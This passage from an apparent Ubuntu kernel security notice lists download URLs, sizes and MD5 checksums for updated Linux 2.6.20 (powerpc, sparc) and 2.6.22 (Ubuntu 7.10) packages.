  Size/MD5:    39778 0f2244003a02e50f05cb36bf02e52da5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   717794 5af7c3eb55b152cff526b32c33531a20
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   776474 b6d3b6504853102e0c39b3dec975bf3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   205058 549486bf0b0d3ec28a0af239f575b3ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   209732 44377dd629f1c1db23b68a46de9fa6d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    59218 88eb3b3602340f8b621f7316b7619569
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    66860 e01835dfd217fc7404fb03f9b0eb3d9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    64200 a0bfd643b213bd60bddf53c8929b3a8b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    65324 188f85a306b57e039077b25ea570ff33
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   144090 f199de239935cef855c54a7d028386a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   162784 b1cb94d67312e7f004c020e411f175d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   383354 04eaff196f60e028c316e9ce098caba3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   251792 aac2012b70917ea7970e33de77b953f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:  2157578 bb7951f55026cbe40039195064571cb8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:  3083390 ad3490bb8cbbaaaf453e2cfc68f2661f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc-smp_2.6.20-16.34_powerpc.deb
  Size/MD5:   868072 e2f22f74e3636ff2c175bcc3bd1bcc8f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc64-smp_2.6.20-16.34_powerpc.deb
  Size/MD5:   871384 558640a6583bbac1c6f1ab65c0f39105
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc_2.6.20-16.34_powerpc.deb
  Size/MD5:   858544 78e49d6e412e0893ad05094beaed384c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_powerpc.deb
  Size/MD5:  8151204 8d3062db10aa3511fc031d8c0aa13c4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc-smp_2.6.20-16.34_powerpc.deb
  Size/MD5: 24516556 509dbee76838cb5036f3a94daef361bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc64-smp_2.6.20-16.34_powerpc.deb
  Size/MD5: 26861066 06e9ce2eb22eb93eff787f79e2e04904
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc_2.6.20-16.34_powerpc.deb
  Size/MD5: 24219098 d032a4570f09e700a2d7be17406751a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc-smp_2.6.20-16.34_powerpc.deb
  Size/MD5:  2128044 61226c9ccefa59b36c64cb48d4ffbd8f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc64-smp_2.6.20-16.34_powerpc.deb
  Size/MD5:  2854452 f1e7c4af285f65c54c3f73b601aefbaa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc_2.6.20-16.34_powerpc.deb
  Size/MD5:  2049692 c8c457931686087ceba6a31fc95e674c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_powerpc.deb
  Size/MD5:   644840 caf9acd0fd0b02a3b75faf9b17d4e6d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   253008 a541093402f366d45304517b4fd54389
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   295086 bb4855cec910c101c882fd9ed47b4b20
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   155546 a67279f494b6cc4e57d6f8699677b955
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   168438 68c42e64674977b49b7f063072facd64
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   248332 95f9d1233f3d12615d98de47887bd57c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   280138 fde4fda71bd171a8351363ea8648ed2a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:  1110476 e36dff54046c10d7ea0810b8139c7217
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:  1110650 3b8f5aec6dda991854dee9f9a10a4f08
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:  1951192 26d78ce2216a97f212b30c098d3d83d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:  2253502 da1a4db59abfd92503867301db1f81e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   233498 1630c711abe20e5514ce51d9c7ba430a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   223078 d3dbb9f6ecfa8b9ab6ac31a09b0d2d8a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   172916 df35f76be2c750777b771aa674ec9e9d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   205486 ad8055d1c3090d403cde4aaa99f8cbc8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   280980 61801d119336f98124f068e4e77e6f93
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   316590 b7893331e57856a0c9f65ad36b5e741d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    44648 934d68c57b2f6d80081b9594f30540be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    43408 f2f2a33061e8f1fc4af8293e8af96162
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    41210 bf293be5d7ac2b446a9e2e3057b3927d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    53682 1c744c28d973ea3a1d88bbe155418375
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    72810 2e746428b1426b81982339320b04cd85
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    85288 b6afcda94e97c363b427c3ffbe06492a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    74538 3ff2b4356cde14630a2fd95ca7426ab7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    29714 26b174cfc25f5659d919ef7e2c377ee5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:     8396 94109c6ac7e606066b4097802318483f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:     9876 600823c7c76e8a28f765174d1d4965a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    56162 bd48637128ccdcf243949e1975d2eed4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    67416 1b1033a9dd03e2fda3a0eaae7d7d2a66
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    86634 1117abd9e041733cc146461886b6e664
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   129210 8d9f100997eca2ea53a3e9fad77edea4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   322556 e5a6a789a923b86878322b451934672a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   322582 7ba8b318656b01ef0ed96f97dabc7ac3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:  1415798 5a7895fdfb2d740cfd55c8479d013d99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:  1345398 5558d96f73b123dd4a1ea4aa9cfb4ae2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    74222 5955d0dd72fb978d3e61b2d3cb60c0a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    83240 4bb8920d4fd944fe61193a7c1cfb7b26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    12012 52c2ae19ee5403334433fc23055b7762
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    13942 03d4dc8b53e82decb22409036515b3ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    78348 1eebba88e687b86b0480c127f198d016
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    85450 489205729e4c72ee92bd2d3c8582cd71
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   398164 ddddfc69b52ea32f28b60a5bda049f19
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   445180 96d05e932deeeb92ccc03031f76dc51f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    76712 220d1579023a0ff90a692bde2e2df73c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   100186 bfb2fc0e4ef1d3797e1d2c37d9e4f27e

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:    53732 126e088e7705b7db76c3daed4b50d404
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:    42158 a60d72f47f91f7c7110b44eced37ea47
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:   211710 8038615e08a2bcbb4a8012e81f351077
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:   607892 ae659c8a47bc0377e3d146d916952be9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:   142706 a3aefa8400d6b2e9671490c728c1c442
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:    51446 6c1fa11911f5260c32985c56f63bab9b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:    37406 c20567b9297dd44eab21877f5b9a9091
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:   151176 ee0be08527952eff3e2ed0a1c11f4e07
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:  1933148 e57d2680d62d695e68f0787f6a8184d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64-smp_2.6.20-16.34_sparc.deb
  Size/MD5:   780450 b24e851d4751aafd89f96b6b6d945831
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64_2.6.20-16.34_sparc.deb
  Size/MD5:   779240 cea2091e22942245018cce0d0a93328d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_sparc.deb
  Size/MD5:  8122088 5c0b0af602cca54f67d8e7edf84837d8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64-smp_2.6.20-16.34_sparc.deb
  Size/MD5: 16955662 769a2e70467b4d46f7ec22bf132e2bc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64_2.6.20-16.34_sparc.deb
  Size/MD5: 16601018 1d0f0ce0673f9ed315b65e28d859a84e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64-smp_2.6.20-16.34_sparc.deb
  Size/MD5:  2263822 b29af8e3f27ca93e0b4cb186c69b9215
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64_2.6.20-16.34_sparc.deb
  Size/MD5:  2177986 e0e3f4e033e7e5b6146a093bc7cbf50a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_sparc.deb
  Size/MD5:   699974 3a1483cdf38fbb3b2e1ae5f227dfcc47
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:   264340 9b68fe2b43a61fcb59f70795bbb58b9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:   156576 fa6d2dc5d481dd4799417062ed18034e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:   241208 3ff9a7c4e6fe2c8374fb22fb423506ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:  1110516 163e2c4fabab3ac148aee6b2256facb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:  1571854 1916d97e91e11ff7e9e15fd595a98e53
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:   180416 3bf9c029d540091c5d64ac0e44d143be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:   310078 e18dfca33751f59e7c6fcce65e097264
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:    39664 cf204a862e9b29704e0b7841b7ca164c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:    37986 fb9b30aa30f85d6d2619e9356521095f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:     8646 7b952e82af185fe035a36231080954d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:    59418 4bc0b24e2fe6443614a21cf0f96bbeea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:    90814 2960211b4dcbaa9a9c2d9a16cce38039
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:   322562 9348c6750b654afd796a800975bcfb24
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:   882354 d09d76538393c1717abe6e537ff82e41
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:     9826 7a4c831d26fee041c618176e2ebd2dd4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:   290222 46b0b52258fbd1afc668965c7bb54d30
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb
  Size/MD5:    54802 2bb011cc6d5cb65777c0c5a025697631

Updated packages for Ubuntu 7.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.51.diff.gz
  Size/MD5:  3536108 c528a2740969db364c6eb9b1a77d688e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.51.dsc
  Size/MD5:     2262 c0868ac81f385b4eaefe240e95af4182
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22.orig.tar.gz
  Size/MD5: 56913972 c98e1329975a8a7931ae63bafe39b63a

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-doc-2.6.22_2.6.22-14.51_all.deb
  Size/MD5:  4614486 3dfca0830ac21485b06c713f9581b92d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14_2.6.22-14.51_all.deb
  Size/MD5:  7776710 b8e3b1d8a257bc7ade3612f005334237
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-kernel-devel_2.6.22-14.51_all.deb
  Size/MD5:    47680 8f4e80e38c3cf8604c94a0d501e3fda2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.51_all.deb
  Size/MD5: 45356762 e1a4381f09d8941168055c58b55e2313

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:    24800 4b070d4f5051b1c9245614d0d9641698
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:   216562 0a62364e601fc0a53d08f881d4197ccb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:    49174 a29794f062daf20bda78a44efb6cb98f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:    40024 fd53998535d067dc8261603189863d97
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:    51752 43c80f4d55e74e0ead5bdfc35fd023d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:    87890 caaa3c7dba61b91e35c339441909bc3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:    35852 e2575f1b4b1f7af947ea12c81e574006
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:   652076 30e06001b28779257732f54bac3ec053
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:   205932 a642190fbf3cb18950a2b19c64567bd7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:    55590 8c44f25182307a028bb83e3363171c18
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:    60506 4b4b57b322e32f3ad7fac716d18e2204
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:   146242 088880b3a46ed49e21b5bc99e2d93b3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:   285920 bd0bfd07786de2e95dd8bd4d1a489405
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:  1947028 b60b2a3b0e16fac8d41c993f46068333
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-generic_2.6.22-14.51_amd64.deb
  Size/MD5:   594312 fba5ad73b589a1f795f2707ac5996087
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-rt_2.6.22-14.51_amd64.deb
  Size/MD5:  1164464 29f65e8274a7e42f51400507dcce93cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-server_2.6.22-14.51_amd64.deb
  Size/MD5:   594410 4588c5c616507c82cafb1f7c3afe4021
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-xen_2.6.22-14.51_amd64.deb
  Size/MD5:   948792 f1c110a5fee8f16757d86a42d84a2bf2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-generic_2.6.22-14.51_amd64.deb
  Size/MD5: 17538638 a1bec9ca0bd6780fcdf144e8102195c0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-server_2.6.22-14.51_amd64.deb
  Size/MD5: 17587828 0c920b926e733cd573b541e94b33d0f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-generic_2.6.22-14.51_amd64.deb
  Size/MD5: 18737098 c2393e7bbed20193e5bdd8a437cfd1a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-server_2.6.22-14.51_amd64.deb
  Size/MD5: 19043692 2b81e14bbe0e215ae470cb68b53b528f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_amd64.deb
  Size/MD5:   653044 f2ffb4e26b49d83d77973c5513923486
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:   252190 af43643d5e55ad157d59acac8b9fcfd5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb
  Size/MD5:   150730 c9b4fe602c5c74a9872b97e80e393306
